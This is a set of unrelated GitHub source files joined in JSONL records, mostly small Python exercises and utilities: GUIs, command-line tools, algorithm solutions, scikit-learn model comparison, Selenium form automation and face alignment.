= Text(font=(\"Abel Regular\", 10),bd=0,bg=\"#FFFFFF\",highlightthickness=0)\nentry_1.place(x=94.0,y=28.6,width=444.0,height=22.0)\nentry_image_2 = PhotoImage(file=resource_path(\"entry_2.png\"))\nentry_bg_2 = canvas.create_image(316.0,106.5,image=entry_image_2)\nentry_2 = Text(font=(\"Abel Regular\", 10),bd=0,bg=\"#FFFFFF\",highlightthickness=0)\nentry_2.place(x=94.0,y=96.6,width=444.0,height=22.0)\ndef btn_click():\n book_inp = entry_1.get(1.0, \"end-1c\")\n author_inp = entry_2.get(1.0, \"end-1c\")\n book_inp = book_inp.strip()\n author_inp = author_inp.strip()\n book_inp = book_inp.title()\n author_inp = author_inp.title()\n global keep_running\n if(book_inp == \"\" and author_inp == \"\"):\n info_text.config(text=\"Please enter the Book's Title and Author\")\n button_1['state'] = \"normal\"\n elif(book_inp == \"\" and author_inp != \"\"):\n info_text.config(text=\"Please enter the Book's Title\")\n button_1['state'] = \"normal\"\n else:\n keep_running = True\n search_the_book(author_inp, book_inp)\n thread_2 = Thread()\n thread_2.start()\n thread_2.join()\ndef thread_make():\n if(check_internet_connection()):\n info_text.config(text=\"Searching....\")\n button_1['state'] = \"disabled\"\n try:\n thread_1 = Thread(target=btn_click)\n thread_1.start()\n except:\n info_text.config(text=\"Please Restart the App\")\ndef check_internet_connection():\n connected_to_internet = False\n IPaddress = gethostbyname(gethostname())\n if IPaddress == \"127.0.0.1\":\n connected_to_internet = False\n info_text.config(text=\"Check your internet connection\")\n else:\n connected_to_internet = True\n return connected_to_internet\ncheck_internet_connection()\nbutton_image_1 = PhotoImage(file=resource_path(\"button_1.png\"))\nbutton_1 = Button(image=button_image_1,borderwidth=0,highlightthickness=0,command=thread_make,relief=\"flat\",cursor=\"hand2\",state=\"normal\")\nbutton_1.place(x=200.0,y=150.0,width=174.8668212890625,height=43.995155334472656)\ndef on_opening():\n for fname in os.listdir(downloads_path):\n if (fname.endswith('.part') or fname.endswith('.crdownload')):\n try:\n os_remove((f\"{downloads_path}\\\\{fname}\"))\n except Exception as e:\n print(e) \ndef on_closing():\n for fname in os.listdir(downloads_path):\n if (fname.endswith('.part') or fname.endswith('.crdownload')):\n try:\n os_remove((f\"{downloads_path}\\\\{fname}\"))\n except Exception as e:\n print(e)\n thread_2 = Thread()\n thread_2.start()\n thread_2.join()\n window.destroy()\non_opening()\nwindow.protocol(\"WM_DELETE_WINDOW\", on_closing)\nwindow.resizable(False, False)\nwindow.attributes('-topmost', 1)\nwindow.mainloop()\n# -------------------------------------------------------------- Current GUI ---------------------------------------------------------------------------------------\n# Code For .exe :\n# pyinstaller Books.py -n Books.io -w --add-binary chromedriver.exe;. -i book.png --add-data book.png;. --add-data entry_1.png;. --add-data entry_2.png;. 
--add-data button_1.png;.\n","repo_name":"RohitKonge/PDF-Version-of-any-Book","sub_path":"Books.py","file_name":"Books.py","file_ext":"py","file_size_in_byte":35211,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"32807061153","text":"import sys\r\n\r\nfrom student import Student, Grade\r\nfrom teacher import Teacher, Load\r\n\r\nstudent = []\r\nteacher = []\r\n\r\n\r\ndef addStudent():\r\n while True:\r\n print()\r\n print('T = Add Teacher')\r\n print('S = Add student')\r\n print()\r\n\r\n add = input('Choose T or S: ')\r\n add = add.upper()\r\n print()\r\n\r\n if add == 'S':\r\n idNum: str = input('Enter ID number: ')\r\n lastName = input('Enter Last name: ')\r\n firstName = input('Enter First Name: ')\r\n middleName = input('Enter Middle name: ')\r\n type = input('Enter Type: ')\r\n year = input('Enter Year level: ')\r\n course = input('Enter Course: ')\r\n section = input('Enter Section: ')\r\n print('_____________________________________________________________________________________________________')\r\n introToComputing = int(input('Enter Introduction to Computing grade: '))\r\n archOrg = int(input('Enter Architecture and Organization grade: '))\r\n sysFun = int(input('Enter System Fundamentals grade: '))\r\n oop = int(input('Enter Object-oriented Programming grade: '))\r\n\r\n student1 = Grade(introToComputing, archOrg, sysFun, oop)\r\n student1.lastName = lastName\r\n student1.firstName = firstName\r\n student1.middleName = middleName\r\n student1.type = type\r\n student1.year = year\r\n student1.course = course\r\n student1.section = section\r\n student1.append(student1)\r\n\r\n\r\n elif add == 'T':\r\n idNum = input('Enter ID number: ')\r\n lastName = input('Enter Last name: ')\r\n firstName = input('Enter FirstName: ')\r\n middleName = input('Enter Middle name: ')\r\n type = input('Enter Type: ')\r\n print('_____________________________________________________________________________________________________')\r\n department = input('Enter Department: ')\r\n position = input('Enter position: ')\r\n subjects = input('Enter Subjects: ')\r\n\r\n teacher1 = Load(subjects)\r\n teacher1.department = department\r\n teacher1.position = position\r\n teacher1.idNum = idNum\r\n teacher1.lastName = lastName\r\n teacher1.firstName = firstName\r\n teacher1.middleName = middleName\r\n teacher1.type = type\r\n teacher1.append(teacher1)\r\n\r\n else:\r\n menu()\r\n\r\n print()\r\n answer = input('Enter another? [y/n]: ')\r\n answer = answer.lower()\r\n\r\n if answer == 'y':\r\n break\r\n menu()\r\n\r\n\r\ndef delRecord():\r\n print()\r\n print('T = delete from Teacher')\r\n print('S = delete from Student')\r\n print('DT = Delete Teacher Record')\r\n print('DS = Delete Student Record')\r\n print('C = clear all')\r\n print()\r\n\r\n delete = input('What do you want to delete? ')\r\n delete = delete.upper()\r\n\r\n if delete == 'S':\r\n i: int = int(input('Enter Index number: '))\r\n student.pop(i)\r\n elif delete == 'T':\r\n i: int = int(input('Enter Index number: '))\r\n teacher.clear()\r\n elif delete == 'DT':\r\n teacher.clear()\r\n elif delete == 'DS':\r\n student.clear()\r\n elif delete == 'C':\r\n student.clear()\r\n teacher.clear()\r\n else:\r\n delRecord()\r\n\r\n menu()\r\n\r\n\r\ndef searRecord():\r\n print()\r\n print('T = search for Teacher')\r\n print('s - Search for Student')\r\n print()\r\n\r\n search = input('What type do you want to search? 
')\r\n search = search.upper()\r\n\r\n if search == 'S':\r\n i = int(input('Enter Index number: '))\r\n print(\r\n f'{i} \\t | {student[i].getType()} \\t | {student[i].getName()} \\t | {student[i].getID()} \\t | {student[i].getYrCrSec()} \\t | {student[i].getAve()} ')\r\n elif search == 'T':\r\n i = int(input('Enter Index number: '))\r\n print(\r\n f'{i} \\t | {teacher[i].getType()} \\t | {teacher[i].getName()} \\t | {teacher[i].getID()} \\t | {teacher[i].getDeptPost()} \\t | {teacher[i].getSub()}')\r\n else:\r\n searRecord()\r\n menu()\r\n\r\n\r\ndef displayRecord():\r\n print()\r\n print('TD = display teacher')\r\n print('SD - display student')\r\n print('DA - display all')\r\n print()\r\n\r\n display1 = input('What type do you want to display? ')\r\n display1 = display1.upper()\r\n\r\n if display1 == 'SD':\r\n print()\r\n print('--------------------------------------------------------------------------------------------------')\r\n i = 0\r\n for s in student:\r\n print(\r\n f'{i} \\t | {student.getType()} \\t | {student.getName()} \\t | {student.getID()} \\t | {student.getYrCrSec()} \\t | {student.getAve()}')\r\n i += 1\r\n print('----------------------------------------------------------------------------------------------')\r\n\r\n elif display1 == 'TD':\r\n print()\r\n print('--------------------------------------------------------------------------------------------------')\r\n i = 0\r\n for t in teacher:\r\n print(\r\n f'{i} \\t | {teacher.getType()} \\t | {teacher.getName()} \\t | {teacher.getID()} \\t | {teacher.DeptPost()} \\t | {teacher.getSubject()}')\r\n i += 1\r\n print('----------------------------------------------------------------------------------------------')\r\n\r\n elif display1 == 'DA':\r\n print()\r\n print('--------------------------------------------------------------------------------------------------')\r\n i = 0\r\n for s in student:\r\n print(\r\n f'{i} \\t | {student.getType()} \\t | {student.getName()} \\t | {student.getID()} \\t | {student.getYrCrSec()} \\t | {student.getAve()}')\r\n i += 1\r\n\r\n i = 0\r\n for t in teacher:\r\n print(\r\n f'{i} \\t | {teacher.getType()} \\t | {teacher.getName()} \\t | {teacher.getID()} \\t | {teacher.DeptPost()} \\t | {teacher.getSubject()}')\r\n i += 1\r\n print('-----------------------------------------------------------------------------------------------------')\r\n\r\n else:\r\n displayRecord()\r\n menu()\r\n\r\n\r\ndef menu():\r\n print('------------------Menu---------------------')\r\n print('DR - delete record SR - search record')\r\n print('A - add record M - display all')\r\n print()\r\n\r\n choice = input('Enter a function: ')\r\n choice = choice.upper()\r\n\r\n if (choice == 'DR'):\r\n delRecord()\r\n elif (choice == 'A'):\r\n addStudent()\r\n elif (choice == 'SR'):\r\n searRecord()\r\n elif (choice == 'M'):\r\n displayRecord()\r\n else:\r\n print()\r\n\r\n\r\nmenu()\r\n","repo_name":"maeannnn/Assignment","sub_path":"display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":6813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30810760982","text":"\"\"\"\nCommand line utility for interacting with SKA Science Data Processor (SDP).\n\nUsage:\n ska-sdp COMMAND [options] [SDP_OBJECT] [...]\n ska-sdp COMMAND (-h|--help)\n ska-sdp (-h|--help)\n\nSDP Objects:\n pb Interact with processing blocks\n workflow Interact with available workflow definitions\n deployment Interact with deployments\n sbi Interact with scheduling block instances\n 
master Interact with Tango master device\n subarray Interact with Tango subarray device\n\nCommands:\n list List information of object from the Configuration DB\n get | watch Print all the information (i.e. value) of a key in the Config DB\n create Create a new, raw key-value pair in the Config DB;\n Run a workflow; Create a deployment\n update Update a raw key value from CLI\n edit Edit a raw key value from text editor\n delete Delete a single key or all keys within a path from the Config DB\n import Import workflow definitions from file or URL\n\"\"\"\nimport logging\nimport sys\n\nfrom docopt import docopt\nfrom ska_sdp_config import config\n\nfrom ska_sdp_config.ska_sdp_cli import (\n sdp_get,\n sdp_create,\n sdp_update,\n sdp_list,\n sdp_delete,\n sdp_import,\n)\n\nLOG = logging.getLogger(\"ska-sdp\")\nLOG.setLevel(logging.INFO)\nLOG.addHandler(logging.StreamHandler(sys.stdout))\n\nCOMMAND = \"COMMAND\"\n\n\ndef main(argv=None):\n \"\"\"Run ska-sdp.\"\"\"\n if argv is None:\n argv = sys.argv[1:]\n\n args = docopt(__doc__, argv=argv, options_first=True)\n cfg = config.Config()\n\n if args[COMMAND] == \"list\":\n sdp_list.main(argv, cfg)\n\n elif args[COMMAND] == \"get\" or args[COMMAND] == \"watch\":\n sdp_get.main(argv, cfg)\n\n elif args[COMMAND] == \"create\":\n sdp_create.main(argv, cfg)\n\n elif args[COMMAND] == \"update\" or args[COMMAND] == \"edit\":\n sdp_update.main(argv, cfg)\n\n elif args[COMMAND] == \"delete\":\n sdp_delete.main(argv, cfg)\n\n elif args[COMMAND] == \"import\":\n sdp_import.main(argv, cfg)\n\n else:\n LOG.error(\n \"Command '%s' is not supported. Run 'ska-sdp --help' to view usage.\",\n args[COMMAND],\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ska-telescope/sdp-config","sub_path":"src/ska_sdp_config/ska_sdp_cli/ska_sdp.py","file_name":"ska_sdp.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30650950835","text":"import sys\n\ndef find(n, k, s): # n은 순열의 인덱스, k는 이전 방문위치, s는 현재까지의 소모량\n global minV\n if n == N: # 순열이 완성된 경우\n s += e[k][0] # 사무실까지의 거리 추가\n if minV>s: # 기존의 최소값보다 작으면\n minV = s\n return\n elif minV <= s: # 순열이 완성되지 않았지만 합이 최소값보다 큰 경우\n return\n else:\n for i in range(1, N): # 순열의 n번 인덱스에 들어갈 숫자 선택\n if u[i] == 0:\n u[i] = 1\n find(n+1, i, s+e[k][i])\n u[i] = 0\n return\n\nsys.stdin = open('input.txt', 'r')\nT = int(input())\nfor tc in range(1, T+1):\n N = int(input())\n e = [list(map(int,input().split())) for x in range (N)]\n u = [0 for i in range(N+1)] # 사용한 숫자 표시\n p = [0 for i in range(N+1)] # 순열저장\n minV = 10000\n u[0] = 1 # 0번은 사무실이므로 고정\n find(1, 0, 0)\n print('#{} {}'.format(tc, minV))\n","repo_name":"pyjune/ssa2019","sub_path":"0326/전기카트2.py","file_name":"전기카트2.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24781572479","text":"from cs50 import get_float\n\nwhile True:\n dollars = get_float(\"Change owed: \")\n if dollars > 0:\n break\n\ncents = dollars * 100\nquaters = cents // 25\ncents -= quaters * 25\ndimes = cents // 10\ncents -= dimes * 10\nnickels = cents // 5\ncents -= nickels * 5\npennies = cents // 1\n\nprint(int(quaters + dimes + nickels + pennies))\n","repo_name":"marsiekiera/CS50x","sub_path":"pset6/cash/cash.py","file_name":"cash.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"24232250315","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def mirrorTree(self, root: TreeNode) -> TreeNode:\n '''递归方法,递归镜像左子节点和右子节点,结束条件是节点为根节点 O(n)'''\n if not root:\n return None\n else:\n root.left,root.right=self.mirrorTree(root.right),self.mirrorTree(root.left)\n return root\n #迭代法 每个子节点左右子树交换,然后组合O(n)\n if not root:return None\n #将二叉树中的节点逐层放入队列中,再迭代处理队列中的元素\n stack=[root]\n while stack:\n #每次从队列中拿一个节点,并交换这个节点的左右字数\n node=stack.pop(0)\n node.left, node.right = node.right, node.left\n #若当前节点的左子树不为空,放入队列等待后续处理\n if node.left:stack.append(node.left)\n # 若当前节点的右子树不为空,放入队列等待后续处理\n if node.right:stack.append(node.right)\n #返回处理完的根节点\n return root\n\n\n\n\n","repo_name":"liucheng2912/py","sub_path":"leecode/easy/2004/27二叉树的镜像.py","file_name":"27二叉树的镜像.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74683391527","text":"#Provided is a list of data about a store’s inventory where each item in the list represents the name of an item, how much is in stock, and how much it costs. Print out each item in the list with the same formatting, using the .format method (not string concatenation). For example, the first print statment should read The store has 12 shoes, each for 29.99 USD.\ninventory = [\"shoes, 12, 29.99\", \"shirts, 20, 9.99\", \"sweatpants, 25, 15.00\", \"scarves, 13, 7.75\"]\nfor x in inventory:\n #print(x)\n #print(type(x))\n a=x.split(',')\n #print(a)\n item=a[1]\n name=a[0]\n cost=a[2]\n print('The store has{} {}, each for{} USD.'.format(item, name, cost))\n","repo_name":"gammarayburst999/Coursera","sub_path":"Python_Basics/Week_04/question_05.py","file_name":"question_05.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12906408876","text":"from project_shared import *\n\n\ndef is_table_exist(table_name, engine=engine) -> bool:\n with engine.connect() as connection:\n try:\n query_string = f'SELECT 1 FROM {table_name} LIMIT 1'\n result = connection.execute(query_string)\n return True if result else False\n except:\n return False\n\n\ndef ticker_lookup(ticker, table_name=QUOTE_TABLE_NAME, engine=engine) -> bool:\n with engine.connect() as connection:\n try:\n query_string = f'SELECT * FROM {table_name} WHERE ticker = \\'{ticker}\\' LIMIT 1'\n result = connection.execute(query_string)\n return True if result.rowcount > 0 else False\n except:\n return False\n\n\ndef get_quotes_by_ticker(ticker, start_date=None, end_date=None, table_name=QUOTE_TABLE_NAME, engine=engine):\n with engine.connect() as connection:\n try:\n query_string = f'SELECT dateTime, open, high, low, close FROM {table_name} WHERE ticker=\\'{ticker}\\''\n if start_date is not None:\n query_string += f' AND dateTime >= \\'{str(start_date)}\\' '\n if end_date is not None:\n query_string += f' AND dateTime <= \\'{str(end_date)}\\' '\n query_string += f' ORDER BY dateTime ASC'\n result = connection.execute(query_string)\n if result.rowcount > 0:\n # print(\"result.rowcount=\" + str(result.rowcount))\n return result.cursor.fetchall()\n else:\n return None\n except:\n return 
None\n","repo_name":"wideGenesis/upsilon_one","sub_path":"charter/sql_queries.py","file_name":"sql_queries.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16483205035","text":"import sys\nimport time\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n# for test data set\nfrom sklearn.model_selection import train_test_split\n# for cross-validation\nfrom sklearn.model_selection import cross_val_score\n# for classifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.svm import SVC\n# for dimension reduction\nfrom sklearn.feature_selection import SequentialFeatureSelector\n\n\n# for order by desc. return second element for sort\ndef takeAccu(elem):\n return elem[1]\n \n\n# analyze on the input data set using several models \n# data: dataframe of input file\n# type: kNN, RandomForest, DecisionTree, SVM\n# problem: what to classfy\n# dimension_reduction: 'Y' yes, 'No' no\ndef analyze(data, model_type, problem, dimension_reduction = 'N'):\n\n for p in problem:\n # separate data into paramters(x) and a value(y)\n df = data.loc[data[0].isin(p)]\n x=df.iloc[:,1:]\n y=df.iloc[:,0]\n print('Classification problem: {}'.format(p))\n print('\\tPicked data: x {}, y {}\\n'.format(x.shape, y.shape))\n\n\n ###################################\n # dimension reduction\n ###################################\n if dimension_reduction == 'Y':\n x = greedyBackward(model_type, x, y)\n\n ###################################\n # set aside 10% for a test later\n ###################################\n X_train,X_test,y_train,y_test=train_test_split(x,y,test_size=0.1) \n\n ###################################\n # set category hyperparameters for each model\n ###################################\n if model_type == 'kNN':\n categories = ['ball_tree','kd_tree','brute']\n elif model_type == 'RandomForest':\n categories = ['gini','entropy','log_loss']\n elif model_type == 'DecisionTree':\n categories = ['gini','entropy','log_loss']\n elif model_type == 'SVM':\n categories = ['linear','poly','rbf']\n\n\n for category in categories:\n k_scores = []\n hyper_score = []\n k_range = range(1, 11)\n if model_type == 'SVM':\n k_range = [0.001, 0.005, 0.01, 0.05, 0.01, 0.5, 1, 3, 5, 10]\n\n ###################################\n # cross validation to find proper hyper parameter\n ################################### \n for k in k_range:\n if model_type == 'kNN':\n model = KNeighborsClassifier(algorithm=category, n_neighbors=k)\n elif model_type == 'RandomForest':\n model = RandomForestClassifier(criterion=category, max_depth=k)\n elif model_type == 'DecisionTree':\n model = DecisionTreeClassifier(criterion=category, max_depth=k)\n elif model_type == 'SVM':\n model = SVC(kernel=category, C=k)\n\n # do a Cross-validation test\n scores = cross_val_score(model, X_train, y_train, cv=5)\n k_scores.append(scores.mean())\n if True:\n print('Testing: cross-vali, model: {}, category param: {}, number param: {}, score: {}'.format(model_type, category, k, scores.mean()))\n\n hyper_score.append((k, scores.mean()))\n\n ###################################\n # choose best hyperparameter from the hyper value we test above\n # pick the hyper parameter that yeilds the hightest score(or accuracy) \n hyper_score.sort(key=takeAccu, reverse=True)\n bestHyper = hyper_score[0][0]\n\n ###################################\n 
# test with a final validation set\n ###################################\n start = time.time()\n if model_type == 'kNN':\n model = KNeighborsClassifier(algorithm=category, n_neighbors=bestHyper)\n elif model_type == 'RandomForest':\n model = RandomForestClassifier(criterion=category, max_depth=bestHyper)\n elif model_type == 'DecisionTree':\n model = DecisionTreeClassifier(criterion=category, max_depth=bestHyper) \n elif model_type == 'SVM':\n model = SVC(kernel=category, C=bestHyper)\n\n model.fit(X_train, y_train) \n finalScore = model.score(X_test, y_test)\n end = time.time()\n print('Result : final-vali, model: {}, category param: {}, number param: {}, score: {}, time: {gap:.4f}\\n'.format(model_type, category, bestHyper, finalScore, gap = (end - start)))\n\n ###################################\n # show plot to see clearly\n ###################################\n if True:\n plt.plot(k_range, k_scores) \n plt.title('{} {} - Category param: {}, Reduced: {}'.format(p, model_type, category, dimension_reduction))\n plt.ylabel('Cross-Validated Accuracy')\n if model_type == 'kNN':\n plt.xlabel('Number param: k(how many neighbors)')\n elif model_type == 'RandomForest':\n plt.xlabel('Number param: k(max depth)')\n elif model_type == 'DecisionTree':\n plt.xlabel('Number param: k(max depth)')\n elif model_type == 'SVM':\n plt.xlabel('Number param: k(C, Regularization parameter)')\n plt.show()\n\n\n# reduce dimension on the input x, y\n# model_type: 'kNN', 'RandomForest', 'DecisionTree', 'SVM'\n# x,y: input data\n# howmany: how many features do you want to left\ndef greedyBackward(model_type, x, y, howmany = 4):\n print('Greedy Backward is in progress.')\n print('\\tbefore x shape: {}'.format(x.shape))\n\n if model_type == 'kNN':\n model = KNeighborsClassifier()\n elif model_type == 'RandomForest':\n model = RandomForestClassifier(max_depth=5)\n elif model_type == 'DecisionTree':\n model = DecisionTreeClassifier(max_depth=8)\n elif model_type == 'SVM':\n model = SVC()\n\n start = time.time()\n sfs = SequentialFeatureSelector(model, direction='backward', n_features_to_select=howmany, cv = 5)\n reduced_x = sfs.fit_transform(x,y)\n end = time.time()\n\n print('\\tafter x shape: {}'.format(reduced_x.shape))\n print('Reduced x: model {}, left features: {}, time: {gap:.4f}\\n'.format(model_type, sfs.get_feature_names_out(), gap = (end - start)))\n\n return reduced_x\n\n\ndef usage(exec_name):\n print('Usage:')\n print('\\tpython %s [arg1] [arg2] [arg3] [arg4]' % (exec_name))\n print('\\targ1: input data file')\n print('\\targ2: choose model. \"kNN\" \"RandomForest\" \"DecisionTree\" \"SVM\" are available')\n print('\\targ3: choose problem. 1:H,K 2:M,Y 3:I,J 4:H,K,M,Y,I,J') \n print('\\targ4: apply dimension reduction. 
Y,y:yes N,n:no') \n print('\\t\\tGreedy Backward Feature Elimination will be applied')\n print('Example:')\n print('\\tpython %s test.data kNN 1 N' % (exec_name))\n print('\\tpython %s test.data RandomForest 2 Y' % (exec_name))\n print('\\tpython %s test.data DecisionTree 3 N' % (exec_name))\n print('\\tpython %s test.data SVM 4 Y' % (exec_name))\n exit()\n\n\n# check arguments and return arguments\ndef checkarg(argv):\n if len(argv) != 5:\n usage(argv[0])\n else :\n model_type = argv[2]\n problem = argv[3]\n reduction = argv[4].upper()\n\n if not (argv[2] == 'kNN' or argv[2] == 'RandomForest' or argv[2] == 'DecisionTree' or argv[2] == 'SVM'):\n print('Error:')\n print('\\tcheck the argument [%s]' % (argv[2]))\n usage(argv[0])\n\n if not (argv[3] == '1' or argv[3] == '2' or argv[3] == '3' or argv[3] == '4'):\n print('Error:')\n print('\\tcheck the argument [%s]' % (argv[3]))\n usage(argv[0])\n\n if not (argv[4] == 'Y' or argv[4] == 'N'):\n print('Error:')\n print('\\tcheck the argument [%s]' % (argv[4]))\n usage(argv[0])\n \n test_problem = []\n if problem == '1':\n test_problem = [['H','K']]\n elif problem == '2':\n test_problem = [['M','Y']]\n elif problem == '3':\n test_problem = [['I','J']]\n elif problem == '4':\n test_problem = [['H','K','M','Y','I','J']]\n\n return [model_type, test_problem, reduction]\n\n\nif __name__ == '__main__':\n\n # check program parameter\n ret_arg = checkarg(sys.argv)\n model_type = ret_arg[0]\n problem = ret_arg[1]\n reduction = ret_arg[2]\n\n data=pd.read_csv(sys.argv[1],header=None)\n print('Loading data from file [{}]'.format(sys.argv[1]))\n print('\\t Loaded data: {}\\n'.format(data.shape))\n \n analyze(data, model_type, problem, reduction)","repo_name":"kbckbc/washu_fl22_cse514","sub_path":"train_model/dd.py","file_name":"dd.py","file_ext":"py","file_size_in_byte":8948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19111386077","text":"def check_age(users, age):\n count = 0\n for i, user in enumerate(users):\n try:\n user_age = int(user['age'])\n except KeyError:\n print(f'Niepoprawne dane: {user}')\n except ValueError:\n print(f'Niepoprawny wiek: {user}')\n else:\n count += 1 if user_age < age else 0\n finally:\n print(f\"{i} - {user}\")\n return count\n\n\nvalid_data = [{'name': 'Jan', 'age': '10'}, {'name': 'Dawid', 'age': '25'}, {'name': 'Marcin', 'age': '23'}]\ninvalid_date = [{}, {'name': 'Dawid', 'age': '25'}, {'name': 'Marcin', 'age': '23'}]\ninvalid_data2 = [{'name': 'Jan', 'age': 'age'}, {'name': 'Dawid', 'age': '25'}, {'name': 'Marcin', 'age': '23'}]\n\nprint(check_age(valid_data, 15))\nprint(check_age(invalid_date, 15))\nprint(check_age(invalid_data2, 15))\n","repo_name":"dev-com2020/szkolenie_061222","sub_path":"kod_czwartek/bledy.py","file_name":"bledy.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20670189975","text":"# imagine we are writing a programme for Hospital in python and we need to check his name , if he is a existing patient , age , patient history and assign him to a doctor baseed on his need\n\n\n# taking his name \nname = 'Jhon Smith'\n# If he is a existing patient\nif_existing = False\n\n# age ( int )\n\nage = 20\n\n\n# new patiend?\n\nnew_Patient = True\n\n# patient History\n\n\npatient_History ='Fever , cough Probably Flu'\n\n# assigned Doctor\n\ndoctor = 'Dr. 
Tahia Rahman'\n\n\n# patient_conclusion = doctor + 'diagnosed that ' + name + age + 'has '+patient_History + 'its Flu' + 'his age is '+age+'and he is a '+new_Patient;","repo_name":"sakibahammed/python-fundamentals","sub_path":"hospital.py","file_name":"hospital.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4379286413","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\nnavegador=webdriver.Chrome()\n\n# abrir a página index (entrar no site da busca jurídica)\nimport os\nimport time\nimport pandas as pd\n\ntabela=pd.read_excel('Processos.xlsx')\nprint(tabela)\n\ncaminho = os.getcwd()\narquivo = caminho + r\"\\index.html\"\n\nnavegador.get(arquivo)\n\nxpathDf='/html/body/div/div/div/a[1]'\nxpathRio='/html/body/div/div/div/a[2]'\nxpathSp='/html/body/div/div/div/a[3]'\nmenu=navegador.find_element(By.XPATH,'/html/body/div/div/button')\n\nfrom selenium.webdriver import ActionChains\n\nfor linha in tabela.index:\n if tabela.loc[linha,'Cidade']=='Distrito Federal':\n item=navegador.find_element(By.XPATH,xpathDf)\n elif tabela.loc[linha,'Cidade']=='Rio de Janeiro':\n item=navegador.find_element(By.XPATH,xpathRio)\n else:\n item=navegador.find_element(By.XPATH,xpathSp)\n ActionChains(navegador).move_to_element(menu).perform()\n time.sleep(2)\n item.click()\n time.sleep(2)\n listaAbas=navegador.window_handles\n\n abaOriginal=navegador.window_handles[0]\n novaAba=navegador.window_handles[1]\n navegador.switch_to.window(novaAba)\n\n try:\n navegador.find_element(By.ID,'nome').send_keys(tabela.loc[linha,'Nome'])\n navegador.find_element(By.ID,'advogado').send_keys(tabela.loc[linha,'Advogado'])\n navegador.find_element(By.ID,'numero').send_keys(tabela.loc[linha,'Processo'])\n navegador.find_element(By.XPATH,'//*[@id=\"formulario\"]/div/button').click()\n except:\n print('Elemento inexistente na aba/pagina atual')\n time.sleep(0.5)\n alerta=navegador.switch_to.alert\n alerta.accept()\n time.sleep(3)\n i=0\n while i<30:\n try:\n alerta=navegador.switch_to.alert\n if \"Processo encontrado com sucesso\" in alerta.text:\n alerta.accept()\n tabela.loc[linha, \"Status\"] = \"Encontrado\"\n else:\n alerta.accept()\n tabela.loc[linha, \"Status\"] = \"Não encontrado\"\n break\n except:\n time.sleep(2)\n i+=1\n \n navegador.close()\n navegador.switch_to.window(abaOriginal)\n\nprint(tabela)\ntabela.to_excel('ProcessosAtualizados.xlsx')\n\n\n\n\n\ntime.sleep(5)","repo_name":"jharbes/hashtagPython","sub_path":"028-automacaoWeb-selenium/26-exercicio-processoConsultaSites/exercicio-processoConsultaSites.py","file_name":"exercicio-processoConsultaSites.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37721284966","text":"import csv\n\n\n\ndef parse_ox_csv(filename):\n result = []\n with open(filename, \"r\") as f:\n reader = csv.reader(f)\n\n # pull of column names\n header = next(reader)\n for row in reader:\n result_row = []\n # pull off row names\n data = row[1:]\n for cell in data:\n try:\n result_row.append(float(cell))\n except ValueError:\n result_row.append(None)\n result.append(result_row)\n return result\n\nif __name__ == \"__main__\":\n\n t1 = parse_ox_csv(\"../resources/testdata/1/raw_data.csv\")\n 
print(t1[0])\n\n\n","repo_name":"rwalk/rsk","sub_path":"util/oxcsv.py","file_name":"oxcsv.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"19626249346","text":"import sys\r\nimport os\r\n\r\nfrom face_alignment import mtcnn\r\nimport argparse\r\nfrom PIL import Image\r\nfrom tqdm import tqdm\r\nimport random\r\nfrom datetime import datetime\r\nmtcnn_model = mtcnn.MTCNN(device='cpu', crop_size=(112, 112))\r\nimport matplotlib.pyplot as plt\r\nimport cv2\r\nimport numpy as np\r\n\r\ndef add_padding(pil_img, top, right, bottom, left, color=(0,0,0)):\r\n width, height = pil_img.size\r\n new_width = width + right + left\r\n new_height = height + top + bottom\r\n result = Image.new(pil_img.mode, (new_width, new_height), color)\r\n result.paste(pil_img, (left, top))\r\n return result\r\n\r\n\r\ndef get_aligned_face(image_path):\r\n img = cv2.cvtColor(image_path, cv2.COLOR_BGR2RGB) #ada2 ada3\r\n img = Image.fromarray(img)\r\n # find face\r\n try:\r\n bboxes, faces = mtcnn_model.align_multi(img, limit=1)\r\n face = faces[0]\r\n except Exception as e:\r\n face = None\r\n box=None\r\n\r\n if(face != None):\r\n bboxes=list(np.reshape(bboxes,5))\r\n bboxes.pop()\r\n bboxes=[int(x) for x in bboxes ]\r\n a=bboxes.pop(0)\r\n bboxes.append(a)\r\n bboxes=[bboxes]\r\n box = [tuple(x) for x in bboxes]\r\n return 